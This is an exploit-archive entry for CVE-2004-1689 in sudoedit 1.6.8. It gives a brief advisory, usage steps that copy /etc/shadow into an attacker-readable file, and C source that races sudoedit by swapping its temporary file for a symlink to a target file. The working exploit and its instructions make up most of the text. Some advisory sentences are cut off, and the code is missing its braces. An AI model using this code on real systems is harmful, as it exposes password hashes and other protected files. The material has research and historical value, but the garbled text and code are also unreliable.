SudoEdit 1.6.8 - Local Change Permission

Related Vulnerabilities: CVE-2004-1689  
Publish Date: 21 Sep 2004

       Copyright © Rosiello Security 2004

                 sudoedit Exploit

SOFTWARE : sudoedit 
DATE: 18/09/2004

A flaw in exists in sudo's -u option (aka sudoedit) 
in sudo version 1.6.8 that can give an attacker 
read permission to a file that would otherwise be 

Sudo versions affected:
1.6.8 only

Reznic Valery discovered the problem. 


All the information that you can find in this software  
were published for educational and didactic purpose only.
The author published this program under the condition 
that is not in the intention of the reader to use them 
in order to bring to himself or others a profit or to bring 
to others damage.

!Respect the law!

How do I use this code ?

To exploit sudoedit you have to open with it the
file "rosiello" as shown in the example.


1) Open two shells (i) and (ii);
2) (i)$sudoedit rosiello;
3) (ii)$./sudoedit-exploit /etc/shadow;
4) (i) close sudoedit.

The file "rosiello" is now a copy of "/etc/shadow".

AUTHOR : Angelo Rosiello
CONTACT: angelo rosiello org


#include <stdio.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <dirent.h>

int main( int argc, char *argv[] )
    char PATH[]="/usr/tmp";
    char file[32];
       DIR *tmp;
       struct dirent *de;
       tmp = opendir ( PATH );
    int found = 0;
    printf( "Copyright © Rosiello Security 2004\n" );
    printf( "\n" );

    if( argc!=2 )
        printf( "USAGE: %s file\n", argv[0] );
        return( 0 );

    while ( (de = readdir ( tmp ))!= NULL )
        if ( (strstr(de->d_name, "rosiello") != NULL) )
            if( strlen(de->d_name) > 24 ) return( 0 ); 
            sprintf( file, "%s/%s", PATH, (char *)de->d_name );
            remove( file );
            if( fork()!=0 )
                execl( "/bin/ln", "ln", "-s", argv[1], file, NULL ); 
            wait( );
            printf( "Now you can close sudoedit and reopen rosiello!\n" );
            goto end;
    closedir( tmp );
    if( !found ) 
        printf( "File Not Found!\n" );
    return( 0 );

// [2004-09-21]